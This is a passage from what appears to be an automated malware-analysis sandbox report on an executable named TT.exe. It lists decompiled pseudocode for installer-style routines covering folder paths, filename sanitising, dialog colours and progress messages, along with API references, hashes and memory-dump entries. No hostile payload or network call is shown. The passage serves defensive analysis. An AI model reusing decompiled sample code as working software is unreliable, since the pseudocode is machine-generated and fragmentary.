					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}



























                                                0x004062bb
                                                0x004062bb
                                                0x004062bb
                                                0x004062c1
                                                0x004062c6
                                                0x004062c8
                                                0x004062d7
                                                0x004062d7
                                                0x004062df
                                                0x004062e0
                                                0x004062e1
                                                0x004062e2
                                                0x004062e5
                                                0x004062ed
                                                0x004062ef
                                                0x00406306
                                                0x00406309
                                                0x00406309
                                                0x004064e0
                                                0x004064e0
                                                0x004064e4
                                                0x00000000
                                                0x00000000
                                                0x00406316
                                                0x0040631c
                                                0x00000000
                                                0x00000000
                                                0x00406322
                                                0x00406323
                                                0x00406326
                                                0x00406329
                                                0x004064d3
                                                0x004064dd
                                                0x004064df
                                                0x004064df
                                                0x004064d5
                                                0x004064d7
                                                0x004064d9
                                                0x004064da
                                                0x004064da
                                                0x00000000
                                                0x004064d3
                                                0x0040632f
                                                0x00406333
                                                0x00406343
                                                0x0040634a
                                                0x0040634d
                                                0x00406355
                                                0x00406358
                                                0x0040635f
                                                0x00406360
                                                0x00406363
                                                0x00406480
                                                0x00406483
                                                0x004064b3
                                                0x004064b6
                                                0x004064bb
                                                0x004064bf
                                                0x004064bf
                                                0x004064c4
                                                0x004064ca
                                                0x004064cc
                                                0x00000000
                                                0x004064cc
                                                0x00406485
                                                0x00406488
                                                0x0040649d
                                                0x004064a4
                                                0x0040648a
                                                0x00406491
                                                0x00406491
                                                0x004064ac
                                                0x004064af
                                                0x00406478
                                                0x00406479
                                                0x00406479
                                                0x00000000
                                                0x004064af
                                                0x00406369
                                                0x00406370
                                                0x00406372
                                                0x00406373
                                                0x0040638d
                                                0x0040638d
                                                0x00406394
                                                0x00406394
                                                0x0040639b
                                                0x0040639f
                                                0x0040639f
                                                0x004063a0
                                                0x004063a2
                                                0x004063db
                                                0x004063de
                                                0x004063ee
                                                0x004063f1
                                                0x004063f9
                                                0x004063ff
                                                0x004063ff
                                                0x0040645e
                                                0x0040645e
                                                0x00406460
                                                0x00000000
                                                0x00000000
                                                0x00406403
                                                0x0040640a
                                                0x0040640b
                                                0x0040640d
                                                0x00406427
                                                0x00406435
                                                0x0040643b
                                                0x0040643d
                                                0x0040645b
                                                0x0040645b
                                                0x0040645b
                                                0x00000000
                                                0x0040645b
                                                0x00406443
                                                0x0040644c
                                                0x0040644f
                                                0x00406455
                                                0x00406459
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406459
                                                0x0040640f
                                                0x00406412
                                                0x00000000
                                                0x00000000
                                                0x00406421
                                                0x00406423
                                                0x00406425
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406425
                                                0x00000000
                                                0x0040645e
                                                0x004063e6
                                                0x00000000
                                                0x004063a4
                                                0x004063bf
                                                0x004063c4
                                                0x004063c7
                                                0x00406467
                                                0x00406467
                                                0x0040646b
                                                0x00406473
                                                0x00406473
                                                0x00000000
                                                0x0040646b
                                                0x004063d1
                                                0x00406462
                                                0x00406462
                                                0x00406465
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406465
                                                0x004063a2
                                                0x00406375
                                                0x00406379
                                                0x00000000
                                                0x00000000
                                                0x0040637b
                                                0x0040637f
                                                0x00000000
                                                0x00000000
                                                0x00406381
                                                0x00406385
                                                0x00000000
                                                0x00406387
                                                0x00406387
                                                0x00000000
                                                0x00406387
                                                0x00406385
                                                0x004064ea
                                                0x004064f4
                                                0x00406500
                                                0x00406500
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 004063E6
                                                • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                                • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?,00420530,00000000,00405387,00420530,00000000), ref: 00406435
                                                • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                                                • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                                • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                                • API String ID: 717251189-2520582795
                                                • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                                • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                0x00406505
                                                0x0040650d
                                                0x00406521
                                                0x00406521
                                                0x00406527
                                                0x00406534
                                                0x00406534
                                                0x00406535
                                                0x00406537
                                                0x0040653b
                                                0x0040653d
                                                0x00406546
                                                0x00406548
                                                0x00406562
                                                0x0040656a
                                                0x0040656a
                                                0x0040656f
                                                0x00406571
                                                0x00406573
                                                0x00406577
                                                0x00406578
                                                0x0040657b
                                                0x00406583
                                                0x00406585
                                                0x00406589
                                                0x00000000
                                                0x00000000
                                                0x0040658f
                                                0x00406594
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406594
                                                0x00406599

                                                APIs
                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TT.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\TT.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                                • CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                                Strings
                                                • *?|<>/":, xrefs: 0040654B
                                                • "C:\Users\user\Desktop\TT.exe" , xrefs: 0040653F
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\TT.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-2178391045
                                                • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                                • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                0x00404325
                                                0x004043db
                                                0x00000000
                                                0x004043db
                                                0x00404336
                                                0x0040433a
                                                0x00000000
                                                0x00404354
                                                0x00404354
                                                0x0040435d
                                                0x00000000
                                                0x00000000
                                                0x0040435f
                                                0x0040436b
                                                0x0040436e
                                                0x0040436e
                                                0x00404374
                                                0x0040437a
                                                0x0040437a
                                                0x00404386
                                                0x0040438c
                                                0x00404393
                                                0x00404396
                                                0x00404399
                                                0x0040439b
                                                0x0040439b
                                                0x004043a3
                                                0x004043a9
                                                0x004043a9
                                                0x004043b3
                                                0x004043b8
                                                0x004043bb
                                                0x004043c0
                                                0x004043c3
                                                0x004043c3
                                                0x004043d3
                                                0x004043d3
                                                0x00000000
                                                0x004043d6

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                0x00405355
                                                0x00405361
                                                0x00405364
                                                0x0040536a
                                                0x00405376
                                                0x00405379
                                                0x0040537c
                                                0x00405382
                                                0x00405382
                                                0x00405388
                                                0x00405390
                                                0x00405393
                                                0x004053b0
                                                0x004053b4
                                                0x004053bd
                                                0x004053bd
                                                0x004053c7
                                                0x004053d0
                                                0x004053dc
                                                0x004053e3
                                                0x004053e7
                                                0x004053ea
                                                0x004053fd
                                                0x0040540b
                                                0x0040540b
                                                0x0040540f
                                                0x00405411
                                                0x00405414
                                                0x00000000
                                                0x00405414
                                                0x00405395
                                                0x0040539d
                                                0x004053a5
                                                0x004053ab
                                                0x00000000
                                                0x004053ab
                                                0x004053a5
                                                0x00405393
                                                0x0040541e

                                                APIs
                                                • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                                • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}







                                                0x00402e5e
                                                0x00402e60
                                                0x00402e67
                                                0x00402e6a
                                                0x00402e6a
                                                0x00402e70
                                                0x00000000
                                                0x00402e70
                                                0x00402e78
                                                0x00402e7e
                                                0x00000000
                                                0x00402e81
                                                0x00402e88
                                                0x00402e8e
                                                0x00402e94
                                                0x00402e96
                                                0x00402e9c
                                                0x00402eda
                                                0x00402ee3
                                                0x00000000
                                                0x00402ee8
                                                0x00402e9e
                                                0x00402ea5
                                                0x00402eb6
                                                0x00000000
                                                0x00402ec4
                                                0x00402ea5
                                                0x00402ef0

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402E6A
                                                • GetTickCount.KERNEL32 ref: 00402E88
                                                • wsprintfA.USER32 ref: 00402EB6
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                  • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                  • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                  • Part of subcall function 00402E36: MulDiv.KERNEL32(00000000,00000064,00000BCE), ref: 00402E4B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                                • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                0x00404c0d
                                                0x00404c1a
                                                0x00404c20
                                                0x00404c5e
                                                0x00404c5e
                                                0x00404c6d
                                                0x00404c74
                                                0x00000000
                                                0x00404c76
                                                0x00404c22
                                                0x00404c31
                                                0x00404c39
                                                0x00404c3c
                                                0x00404c4e
                                                0x00404c54
                                                0x00404c5b
                                                0x00000000
                                                0x00404c5b
                                                0x00000000

                                                APIs
                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C1A
                                                • GetMessagePos.USER32 ref: 00404C22
                                                • ScreenToClient.USER32 ref: 00404C3C
                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C4E
                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C74
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
